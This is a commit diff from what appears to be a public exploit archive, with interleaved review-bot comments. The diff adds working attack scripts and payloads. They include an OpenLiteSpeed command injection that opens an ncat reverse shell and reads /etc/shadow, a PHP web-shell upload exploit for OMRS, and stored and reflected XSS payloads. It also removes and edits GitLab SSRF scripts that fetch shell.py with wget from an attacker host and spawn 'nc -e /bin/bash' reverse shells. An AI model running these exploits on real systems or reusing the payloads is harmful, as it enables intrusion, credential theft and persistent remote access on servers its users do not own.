DB: 2021-02-12
8 changes to exploits/shellcodes Online Marriage Registration System 1.0 - Remote Code Execution Online Marriage Registration System 1.0 - Remote Code Execution (1) Gitlab 11.4.7 - Remote Code Execution GitLab 11.4.7 - Remote Code Execution (Authenticated) (1) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2) GitLab 11.4.7 - Remote Code Execution (Authenticated) GitLab 11.4.7 - RCE (Authenticated) GitLab 11.4.7 - RCE (Authenticated) (2) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting b2evolution 6.11.6 - 'redirect_to' Open Redirect b2evolution 6.11.6 - 'tab3' Reflected XSS Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
parent
fcdaf2028f
commit
b96bdbcfa5
8 changed files with 287 additions and 273 deletions
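--- a/exploits/multiple/webapps/49556.py
+++ b/exploits/multiple/webapps/49556.py
@@ -0,0 +1,142 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
+# Date: 26/1/2021
+# Exploit Author: Metin Yunus Kandemir
+# Discovered by: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+
+import requests
+import sys
+import urllib3
+from bs4 import BeautifulSoup
+
+"""
+Description:
+The "path" parameter has command injection vulnerability that leads to escalate privilege.
+OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
+extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
+Details: https://github.com/litespeedtech/openlitespeed/issues/217
+Example:
+Step-1:
+ubuntu@ubuntu:~$ cat /etc/shadow
+cat: /etc/shadow: Permission denied
+Step-2:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Step-3:
+ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
+[+] Authentication was successful!
+[+] Version is detected: OpenLiteSpeed 1.7.8
+[+] The target is vulnerable!
+[+] tk value is obtained: 0.98296300 1612966522
+[+] Sending reverse shell to 127.0.0.1:4444 ...
+[+] Triggering command execution...
+Step-4:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from 127.0.0.1 54534 received!
+cat /etc/shadow
+root:!:18620:0:99999:7:::
+daemon:*:17937:0:99999:7:::
+bin:*:17937:0:99999:7:::
+sys:*:17937:0:99999:7:::
+sync:*:17937:0:99999:7:::
+.
+.
+.
+"""
+
+def triggerCommandExec(target, s):
+data = {"act" : "restart"}
+trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
+if trigger.status_code == 200:
+print("[+] Triggering command execution...")
+else:
+print("[-] Someting went wrong!")
+
+def commandExec(tk, groupId, s, target):
+data = {
+"name" : "lsphp",
+"address" : "uds://tmp/lshttpd/lsphp.sock",
+"note" : "",
+"maxConns" : "10",
+"env" : "PHP_LSAPI_CHILDREN=10",
+"initTimeout" : "60",
+"retryTimeout" : "0",
+"persistConn" : "1",
+"pcKeepAliveTimeout" : "",
+"respBuffer" : "0",
+"autoStart" : "2",
+"path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",
+"backlog" : "100",
+"instances" : "1",
+"extUser" : "root",
+"extGroup" : groupId ,
+"umask" : "",
+"runOnStartUp" : "1",
+"extMaxIdleTime" : "",
+"priority" : "0",
+"memSoftLimit" : "2047M",
+"memHardLimit" : "2047M",
+"procSoftLimit" : "1400",
+"procHardLimit" : "",
+"a" : "s",
+"m" : "serv",
+"p" : "ext",
+"t" : "A_EXT_LSAPI",
+"r" : "lsphp",
+"tk" : tk
+}
+exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)
+
+if exec.status_code == 200:
+if exec.text == "Illegal entry point!":
+print("[-] tk value is incorrect!")
+sys.exit(1)
+else:
+print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
+else:
+print("[-] Something went wrong!")
+sys.exit(1)
+
+triggerCommandExec(target, s)
+
+def loginReq(target, username, password, groupId):
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+s = requests.Session()
+data = {"userid" : username , "pass" : password }
+login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)
+
+if login.status_code == 302:
+print("[+] Authentication was successful!")
+elif login.status_code == 200:
+print("[-] Authentication was unsuccessful!")
+sys.exit(1)
+else:
+print("[-] Connection error!")
+sys.exit(1)
+
+version = s.get("https://" + target + "/index.php")
+versionSource = BeautifulSoup(version.text, "html.parser")
+v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
+print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
+if v.split()[2] == "1.7.8":
+print("[+] The target is vulnerable!")
+
+#getting tk value
+getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
+source = BeautifulSoup(getTk.text, 'html.parser')
+tk = source.find('input', {'name':'tk'}).get('value')
+print("[+] tk value is obtained: "+tk)
+commandExec(tk, groupId, s, target)
+
+def main(args):
+if len(args) != 5:
+print("usage: %s targetIp:port username password groupId " %(args[0]))
+print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
+sys.exit(1)
+loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])
+
+if __name__ == "__main__":
+main(args=sys.argv)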
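Review bot: In loginReq the version test `if v.split()[2] == "1.7.8":` has no else branch, so the script carries on to rewrite the lsphp external-app entry and restart the service even when the detected version is not the one named in the header. A proof of concept that changes server configuration should stop there: add `else:` followed by `print("[-] Version is not 1.7.8, aborting.")` and `sys.exit(1)`. The docstring should also state that the run leaves the modified external-app entry (with `runOnStartUp` set to `1`) in the admin configuration, so whoever tests with it knows the entry must be restored afterwards. In commandExec the local name `exec` shadows the builtin; `resp` would read better.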
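--- a/exploits/php/webapps/49553.txt
+++ b/exploits/php/webapps/49553.txt
@@ -0,0 +1,19 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://www.peel.fr/
+# Software Link: https://sourceforge.net/projects/peel-shopping/
+# Software: : PEEL SHOPPING 9.3.0
+# Vulnerability Type: Stored Cross-site Scripting
+# Vulnerability: Stored XSS
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
+# Vulnerable parameters: 'Address'
+# Payload used:
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+# POC: in the same page where we injected payload click on the text box to edit the address.
+# You will see your Javascript code (XSS) executed.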
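--- a/exploits/php/webapps/49554.txt
+++ b/exploits/php/webapps/49554.txt
@@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
+# Date: 10/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE : CVE-2020-22840
+
+
+--------------------------Proof of Concept-----------------------
+
+
+1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
+2. The user will be redirected to Google.com or any other attacker controlled domain
+3. This can be used to perform malicious phishing campaigns on unsuspecting users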
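--- a/exploits/php/webapps/49555.txt
+++ b/exploits/php/webapps/49555.txt
@@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
+# CVE: CVE-2020-22839
+# Date: 10/02/2021
+# Exploit Author: Nakul Ratti, Soham Bakore
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+
+--------------------------Proof of Concept-----------------------
+
+Steps to Reproduce:
+
+1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
+2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered which will execute the malicious javascript payload in users browser.
+3. The vulnerable parameter in this case is “tab3”.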
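--- a/exploits/php/webapps/49557.py
+++ b/exploits/php/webapps/49557.py
@@ -0,0 +1,79 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
+# Date: 10/02/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Xampp Server and Wamp Server
+# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
+# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
+# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123
+
+import os
+import sys
+import random
+import argparse
+import requests
+
+
+def get_args():
+parser = argparse.ArgumentParser()
+parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
+parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
+parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
+my_args = parser.parse_args()
+return my_args
+
+
+def login(url, mobile, password):
+url = "%s/user/login.php"%(url)
+payload = {'mobno':mobile, 'password':password, 'login':''}
+req = requests.post(url, data=payload)
+return req.cookies['PHPSESSID']
+
+
+def upload(url, cookie, file=None):
+url = "%s/user/marriage-reg-form.php"%url
+files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
+req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
+print('[+] PHP shell uploaded')
+
+
+def get_remote_php_files(url):
+url = "%s/user/images"%(url)
+req = requests.get(url)
+php_files = []
+for i in req.text.split(".php"):
+php_files.append(i[-42:])
+return php_files
+
+
+def exec_command(url, webshell, command):
+url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
+req = requests.get(url_r)
+print("[+] Command output\n%s"%(req.text))
+
+
+def register(mobile, password, url):
+url_r = "%s/user/signup.php"%(url)
+data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
+req = requests.post(url_r, data=data)
+print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))
+
+
+if __name__ == "__main__":
+args = get_args()
+url = args.url
+command = args.command
+mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
+password = "dante123" if args.password is None else args.password
+if args.password is None or args.mobile is None:
+register(mobile,password,url)
+cookie = login(url, mobile, password)
+initial_php_files = get_remote_php_files(url)
+upload(url, cookie)
+final_php_files = get_remote_php_files(url)
+webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
+exec_command(url,webshell,command)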
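Review bot: The script never removes the file that upload() places under `/user/images`, and nothing in the header comments says so. exec_command reaches that file with a plain `requests.get(url_r)` and no session cookie, which suggests the file stays usable by anyone who can reach the directory after the test ends. The header should carry a line such as `# NOTE: the uploaded file and the registered test account are left on the server; remove both after testing.` On style, `os` and `sys` are imported but unused, and the `file=None` parameter of upload() is never read.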
|
@ -1,262 +0,0 @@
|
||||||
# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
|
|
||||||
# Date: 15th December 2020
|
|
||||||
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
|
|
||||||
# Software Link: https://about.gitlab.com/
|
|
||||||
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
|
|
||||||
# Tested on: GitLab 11.4.7 CE
|
|
||||||
# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
|
|
||||||
|
|
||||||
import requests
|
|
||||||
import re
|
|
||||||
import warnings
|
|
||||||
from bs4 import BeautifulSoup
|
|
||||||
import sys
|
|
||||||
import base64
|
|
||||||
import urllib
|
|
||||||
from random_words import RandomWords
|
|
||||||
import argparse
|
|
||||||
import os
|
|
||||||
import time
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
|
|
||||||
parser.add_argument('-U',help='GitLab Username')
|
|
||||||
parser.add_argument('-P',help='Gitlab Password')
|
|
||||||
parser.add_argument('-l',help='rev shell lhost')
|
|
||||||
parser.add_argument('-p',help='rev shell lport ',type=int)
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
|
|
||||||
username = args.U
|
|
||||||
password = args.P
|
|
||||||
lhost = args.l
|
|
||||||
lport = args.p
|
|
||||||
|
|
||||||
|
|
||||||
#Retrieve CSRF Token
|
|
||||||
|
|
||||||
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
|
||||||
gitlab_url = "http://10.129.49.62:5080"
|
|
||||||
request = requests.Session()
|
|
||||||
print("[+] Retrieving CSRF token to submit the login form")
|
|
||||||
time.sleep(1)
|
|
||||||
page = request.get(gitlab_url+"/users/sign_in")
|
|
||||||
html_content = page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
token = soup.findAll('meta')[16].get("content")
|
|
||||||
|
|
||||||
|
|
||||||
print("[+] CSRF Token : "+token)
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
|
|
||||||
#Login
|
|
||||||
|
|
||||||
login_info ={
|
|
||||||
"authenticity_token": token,
|
|
||||||
"user[login]": username,
|
|
||||||
"user[password]": password,
|
|
||||||
"user[remember_me]": "0"
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
login_request = request.post(gitlab_url+"/users/sign_in",login_info)
|
|
||||||
|
|
||||||
|
|
||||||
if login_request.status_code==200:
|
|
||||||
print("[+] Login Successful")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
else:
|
|
||||||
|
|
||||||
print("Login Failed")
|
|
||||||
print(" ")
|
|
||||||
sys.exit()
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#Exploitation
|
|
||||||
|
|
||||||
print("[+] Running Exploit")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
|
|
||||||
|
|
||||||
|
|
||||||
r = RandomWords()
|
|
||||||
project_name = r.random_word()
|
|
||||||
project_url = '%s/%s/'%(gitlab_url,username)
|
|
||||||
|
|
||||||
print("[+] Creating Project")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Project Name : "+project_name)
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
print("[+] Creating Python Reverse Shell")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
|
|
||||||
python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
|
|
||||||
|
|
||||||
|
|
||||||
os.system("touch shell.py")
|
|
||||||
shell_file = open("shell.py","w")
|
|
||||||
shell_file.write(python_shell)
|
|
||||||
shell_file.close()
|
|
||||||
|
|
||||||
|
|
||||||
print("[+] Reverse Shell Generated")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
print("[+] Start HTTP Server in current directory")
|
|
||||||
|
|
||||||
|
|
||||||
print("Command : python3 -m http.server 80")
|
|
||||||
time.sleep(2)
|
|
||||||
|
|
||||||
http_server = raw_input("Continue (Y/N) : ")
|
|
||||||
|
|
||||||
if (http_server=="N") or (http_server=="n"):
|
|
||||||
print("Start HTTP Server before running exploit")
|
|
||||||
|
|
||||||
elif (http_server=="Y") or (http_server=="y"):
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
print("Run this script twice with options below to get SHELL!")
|
|
||||||
print("")
|
|
||||||
print("Option 1 : Download shell.py rev shell to server using wget")
|
|
||||||
print("Option 2 : Execute shell.py downloaded previously")
|
|
||||||
|
|
||||||
option = raw_input("Option (1/2) : ")
|
|
||||||
|
|
||||||
|
|
||||||
if option=="1":
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
reverse_shell= """\nmulti
|
|
||||||
sadd resque:gitlab:queues system_hook_push
|
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
|
||||||
exec
|
|
||||||
exec
|
|
||||||
exec\n""" %(lhost)
|
|
||||||
|
|
||||||
|
|
||||||
project_page = request.get(gitlab_url+"/projects/new")
|
|
||||||
html_content = project_page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
project_token = soup.findAll('meta')[16].get("content")
|
|
||||||
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
|
||||||
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
|
||||||
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
|
||||||
|
|
||||||
|
|
||||||
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
proxies = {
|
|
||||||
"http" : "http://127.0.0.1:8080",
|
|
||||||
"https" : "https://127.0.0.1:8080",
|
|
||||||
}
|
|
||||||
|
|
||||||
cookies = {
|
|
||||||
'sidebar_collapsed': 'false',
|
|
||||||
'event_filter': 'all',
|
|
||||||
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
|
||||||
'_gitlab_session':request.cookies['_gitlab_session'],
|
|
||||||
}
|
|
||||||
|
|
||||||
headers = {
|
|
||||||
'Host': '10.129.49.31:5080',
|
|
||||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
|
||||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language': 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding': 'gzip, deflate',
|
|
||||||
'Referer': 'http://10.129.49.31:5080/projects',
|
|
||||||
'Content-Type': 'application/x-www-form-urlencoded',
|
|
||||||
'Content-Length': '398',
|
|
||||||
'Connection': 'close',
|
|
||||||
'Upgrade-Insecure-Requests': '1',
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
|
||||||
|
|
||||||
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
|
||||||
print("[+] Success!")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Run Exploit with Option 2")
|
|
||||||
|
|
||||||
|
|
||||||
elif option=="2":
|
|
||||||
|
|
||||||
reverse_shell= """\nmulti
|
|
||||||
sadd resque:gitlab:queues system_hook_push
|
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
|
||||||
exec
|
|
||||||
exec
|
|
||||||
exec\n"""
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
project_page = request.get(gitlab_url+"/projects/new")
|
|
||||||
html_content = project_page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
project_token = soup.findAll('meta')[16].get("content")
|
|
||||||
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
|
||||||
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
|
||||||
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
|
||||||
|
|
||||||
|
|
||||||
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
proxies = {
|
|
||||||
"http" : "http://127.0.0.1:8080",
|
|
||||||
"https" : "https://127.0.0.1:8080",
|
|
||||||
}
|
|
||||||
|
|
||||||
cookies = {
|
|
||||||
'sidebar_collapsed': 'false',
|
|
||||||
'event_filter': 'all',
|
|
||||||
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
|
||||||
'_gitlab_session':request.cookies['_gitlab_session'],
|
|
||||||
}
|
|
||||||
|
|
||||||
headers = {
|
|
||||||
'Host': '10.129.49.31:5080',
|
|
||||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
|
||||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language': 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding': 'gzip, deflate',
|
|
||||||
'Referer': 'http://10.129.49.31:5080/projects',
|
|
||||||
'Content-Type': 'application/x-www-form-urlencoded',
|
|
||||||
'Content-Length': '398',
|
|
||||||
'Connection': 'close',
|
|
||||||
'Upgrade-Insecure-Requests': '1',
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
|
||||||
|
|
||||||
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
|
||||||
print("[+] Success!")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Spawning Reverse Shell")
|
|
|
@ -1,10 +1,10 @@
|
||||||
# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
|
# Exploit Title: GitLab 11.4.7 RCE (POC)
|
||||||
# Date: 24th December 2020
|
# Date: 24th December 2020
|
||||||
# Exploit Author: Sam Redmond
|
# Exploit Author: Norbert Hofmann
|
||||||
|
# Original Exploit Authors: Sam Redmond, Tam Lai Yin
|
||||||
# Software Link: https://gitlab.com/
|
# Software Link: https://gitlab.com/
|
||||||
# Environment: GitLab 11.4.7, community edition
|
# Environment: GitLab 11.4.7, community edition
|
||||||
# CVE: CVE-2018-19571 + CVE-2018-19585
|
# CVE: CVE-2018-19571 + CVE-2018-19585
|
||||||
# Version: 11.4.7
|
|
||||||
|
|
||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
@ -26,7 +26,7 @@ username = args.u
|
||||||
password = args.p
|
password = args.p
|
||||||
gitlab_url = args.g + ":5080"
|
gitlab_url = args.g + ":5080"
|
||||||
local_ip = args.l
|
local_ip = args.l
|
||||||
local_port = args.p
|
local_port = args.P
|
||||||
|
|
||||||
session = requests.Session()
|
session = requests.Session()
|
||||||
|
|
||||||
|
@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}")
|
||||||
|
|
||||||
form = """\nmulti
|
form = """\nmulti
|
||||||
sadd resque:gitlab:queues system_hook_push
|
sadd resque:gitlab:queues system_hook_push
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
|
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
|
||||||
exec
|
exec
|
||||||
exec
|
exec
|
||||||
exec\n"""
|
exec\n"""
|
||||||
|
|
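Review bot: `#!/usr/bin/python3` appears below the comment header in the first hunk, so it is not the first line of the file and has no effect as an interpreter line when the script is run directly; it should move above `# Exploit Title`. The second hunk also shows why two options that differ only in case are fragile: `password = args.p` sits directly above the `local_port` assignment. Giving the port a descriptive argparse `dest` would make the two harder to confuse. The argparse setup is outside the visible hunks, so that part is inferred from the attribute names.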
|
@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
|
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
|
||||||
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
|
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
|
||||||
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
|
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
|
||||||
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
|
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php,
|
||||||
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||||
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
|
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
|
||||||
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
||||||
|
@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port
|
||||||
